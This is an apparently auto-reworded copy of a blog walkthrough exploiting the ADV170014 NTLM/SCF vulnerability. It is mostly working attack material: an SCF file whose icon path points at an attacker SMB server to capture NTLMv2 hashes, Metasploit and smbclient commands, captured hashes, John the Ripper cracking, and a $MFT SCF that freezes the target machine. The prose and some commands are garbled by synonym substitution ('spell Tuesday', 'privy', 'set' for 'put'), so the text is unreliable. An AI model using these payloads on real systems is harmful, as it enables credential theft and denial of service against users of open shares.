-->
Adv170014 Ntlm Sso: Exploitation Guide

Adv170014 Ntlm Sso: Exploitation Guide

Adv170014 Ntlm Sso: Exploitation Guide

October 2017, Microsoft spell Tuesday included an optional safety advisory, ADV170014, this advisory makes reference to a põrnikas on the NTLM authentication scheme, that allows a malicious aggressor to steal hashes in addition to to remote freeze the vulnerable machine.
I’ve reported this põrnikas on May 24 2017, in addition to was officially unopen yesteryear Microsoft on Oct xviii 2017.
Influenza A virus subtype H5N1 total of 148 days was the fourth dimension required yesteryear Microsoft to banking concern fit this issue.
I’m making this world now, after Oct spell Tuesday, that the official ‘solution’ went public, immediately it’s upwardly to organisation administrator to apply the spell on the registry, if their electrical current province of affairs allows that, But we’ll become dorsum to that after on.

The vulnerability

It is a known upshot that Microsoft NTLM architecture has some failures, hash stealing is non something new, it is i of the outset things a pentester tries when attacking a Microsoft environment.
But, most of these techniques require user intervention or traffic interception to fulfill the attack.
These novel attacks require no user interaction, everything is done from the attacker’s side, but of course, at that spot are some weather that demand to hold upwardly met to hold upwardly successful amongst this attack.

Attack scenario

To execute this assault a shared folder amongst no password protection is required on the target machine, this is normal deportment on offices, schools, hospitals in addition to almost all Windows environments, people part folders to part music, photos in addition to documents.
Let’s nation that the user ‘Juan’, creates a folder on his Desktop called ‘Prueba2’, in addition to decides to part that folder amongst his team.
  this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide
Carpeta vulnerable compartida en Windows
Now, let’s motility to the ‘Sharing’ tab to alteration the folder properties in addition to allow sharing without using passwords.
  this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide
Pestaña de propiedades compartidas en carpeta vulnerable

Here nosotros tin run across the shared folder path, \\JUAN-PC\Users\juan\Desktop\prueba2
Now, nosotros must click on ‘Network in addition to Sharing center’
  this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide
Network in addition to Sharing center, propiedades de carpeta vulnerable.

Here nosotros click on ‘Turn off password protected sharing’ option, this basically allows whatever user to access the shared folder without authentication.

SCF files

SCF files were introduced yesteryear Microsoft on Windows 3.11 time, These are manifestly text files that teach Windows File Explorer to execute some basic tasks.
There are already a few SCF file- based attacks, but until now, all these attacks requires user intervention to execute the SCF file.
We conduct maintain 2 recent examples, the attacks created by Bosko Stankovic from Defense Code, inwards the paper Stealing Windows Credentials Using Google Chrome also the 2015 Black Hat presentation where Jonathan Brossard in addition to Hormazd Billimoria demonstrated the assault called SMB: Sharing to a greater extent than than only your files.
The basic SCF file construction is every bit follows:
1
2
3
4
5
[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop
Just that, it is worth to holler upwardly that SCF files are some of the to a greater extent than obscure Windows functionalities, in addition to that the documentation is almost non existent.

The attack, Steal the hash

To perform this attack, nosotros are going to utilization Metasploit, in addition to a SCF file crafted the next way.
1
2
3
4
5
6
7
8
root@sysadminjd: # truthful cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
 
root@sysadminjd: #
The machine amongst the IP address 192.168.1.111 is our attacking machine, where nosotros are running capture/smb Metasploit module
1
2
3
4
5
6
7
8
9
10
root@sysadminjd: # msfconsole -q
 
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > laid JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running every bit background job
 
[*] Server started.
msf auxiliary(smb)
We are going to likewise use John the Ripper  to fissure the hashes, that’s why nosotros define the option JOHNPWFILE , pointing it to the file /tmp/smbhash.txt, where hopefully we’ll conduct maintain our captured hashes.
At this point, the ‘Prueba2’ folder is totally empty, but at that spot is no demand to conduct maintain it empty.
  this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide
Carpeta vulnerable antes del ataque
With everything inwards place, nosotros upload the SCF file to the vulnerable folder using whatever method nosotros desire to use, OSX Finder, Windows file explorer or inwards this instance the dominance trace utility smbclient.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@sysadminjd: # smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:
OS=[Windows seven Ultimate 7601 Service Pack 1] Server=[Windows seven Ultimate 6.1]
smb: \> cd juan
smb: \juan\> cd Desktop\
smb: \juan\Desktop\> cd prueba2\
smb: \juan\Desktop\prueba2\> set test.scf
putting file test.scf every bit \juan\Desktop\prueba2\test.scf (88.9 kb/s) (average 88.9 kb/s)
smb: \juan\Desktop\prueba2\> ls
. D 0 Monday Oct 23 12:27:15 2017
.. D 0 Monday Oct 23 12:27:15 2017
.DS_Store AH 6148 Tue May 23 17:29:03 2017
test.scf Influenza A virus subtype H5N1 91 Monday Oct 23 12:27:15 2017
 
6527487 blocks of size 4096. 4043523 blocks available
smb: \juan\Desktop\prueba2\>
root@sysadminjd: #
The vulnerable folder immediately contains our SCF file
  this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide
Carpeta vulnerable con archivo SCF

At this point, our Metasploit console must hold upwardly showing something similar this
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf auxiliary(smb) >
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:47894338d99abe2f08e2c693618c7323
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e97b70559f29462e2ca221d31113b9ca
NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb8b228b739cc95a12d7e0d89d89e002
NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:4abb0803c4afd1509bfca3bbc566ad70
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5eeb82aab85e9663624aaf6500e4d8f8
NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:55a0cb725a5a171cffdccea36fdcd934
NT_CLIENT_CHALLENGE:010100000000000054118f2c1d4cd301f718b1ba2d4efc7800000000020000000000000000000000
As you lot run across see, a unmarried upload tin trigger several authentication requests, hence no demand to worry nigh that.
Now that nosotros conduct maintain the hashes on our attacking machine, nosotros tin utilization John to endeavour to larn the manifestly text.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@sysadminjd: # cd /tmp/
root@sysadminjd:/tmp# privy smbhash.txt_netntlmv2
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded half dozen password hashes with 6 unlike salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost whatever other fundamental for status
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s 585124C/s abc
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@sysadminjd:/tmp#
John was able to recover the plaintext, the logged inwards user ‘juan’ has a uncomplicated password ‘abc’.

The attack, freezing the machine

The mo assault allows us to freeze the remote machine remotely, let’s run across how.
We require the same vulnerable folder, nosotros tin utilization the same i nosotros utilization on the outset step, nosotros likewise demand a SCF file, amongst a piffling difference.
1
2
3
4
5
6
7
root@sysadminjd: # truthful cat mft.scf
[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
root@sysadminjd: #
This SCF files contains a telephone telephone to $MFT, which locks the NTFS filesystem, this is discussed on this weblog entry (Sorry, solely Spanish) or you lot tin conduct maintain a await on the cyberspace for amend resources on the topic.
Now, nosotros only upload the SCF file to the vulnerable machine, using i time to a greater extent than smbclient
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@sysadminjd: # smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:
 
OS=[Windows seven Ultimate 7601 Service Pack 1] Server=[Windows seven Ultimate 6.1]
 
smb: \Z cd
 
Default\ desktop.ini juan\ Public\
 
smb: \> cd juan\Desktop\prueba2\
smb: \juan\Desktop\prueba2\> ls
. D 0 quarta-feira May 24 18:08:34 2017
.. D 0 quarta-feira May 24 18:08:34 2017
.DS_Store AH 6148 Tue May 23 17:29:03 2017
1.exe Influenza A virus subtype H5N1 7168 Tue May 23 17:29:03 2017
prueba.scf Influenza A virus subtype H5N1 92 quarta-feira May 24 18:08:34 2017
 
6527487 blocks of size 4096. 4156104 blocks available
 
smb: \juan\Desktop\prueba2\> set mft.scf
putting file mft.scf every bit \juan\Desktop\prueba2\mft.scf (17.6 kb/s) (average 17.6 kb/s)
And that’s all, at that spot is no demand for to a greater extent than intervention from the aggressor or the user, the machines immediately starts to lock the file organisation until the bespeak it needs a reboot.

Who is vulnerable?

Accordingly to Microsoft, all Windows versions since 3.11 till Windows 10, Desktop in addition to server are vulnerable to this variety of attack.
Honestly, I conduct maintain solely tested on Windows seven in addition to Windows 10, in addition to then I passed the ball to Microsoft   this advisory makes reference to a põrnikas on the NTLM authentication  scheme ADV170014 NTLM SSO: Exploitation Guide

Mitigation

Microsoft created a sort of spell to this vulnerability consisting inwards changing 2 registry keys to disable NTLM on the system. This registry keys are available solely on Windows 10 in addition to Windows Server 2016, in addition to Microsoft has no intentions to backport to the other versions.
Another upshot is that disabling NTLM volition intermission a lot of environments, in addition to that’s a huge trace of piece of work organisation for them.
My proposition is to utilization potent passwords, after the assault nosotros demand to fissure the hash, that tin conduct maintain a lot of fourth dimension if the password is complex, in addition to tin hold upwardly frustrating for the attacker.
The amend approach, don’t part folders without passwords, that’ll exercise the trick.

Acknowledgments in addition to concluding comments

This vulnerability has been some for a long long time, I conduct maintain been exploiting this for almost a twelvemonth now, on my pentesting tasks of course.
It is hence uncomplicated that allows almost anybody to exploit it, the adept matter is that certains weather are needed to hold upwardly successful on the exploitation, the default Windows configuration is non vulnerable.
I desire to give cheers to Microsoft Security Response Center, they worked difficult to endeavour to cook this, in addition to provided a partial spell for the issue, a total spell was non possible without breaking Windows at all.
This exploit was non possible without the splendid piece of work done yesteryear Bosko Stankovic from Defense Code inwards the paper Stealing Windows Credentials Using Google Chrome and Jonathan Brossard / Hormazd Billimoria’s Black Hat presentation SMB: Sharing to a greater extent than than only your files.
And of course, give cheers you lot for reading this quite long weblog entry.

Cheers!
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser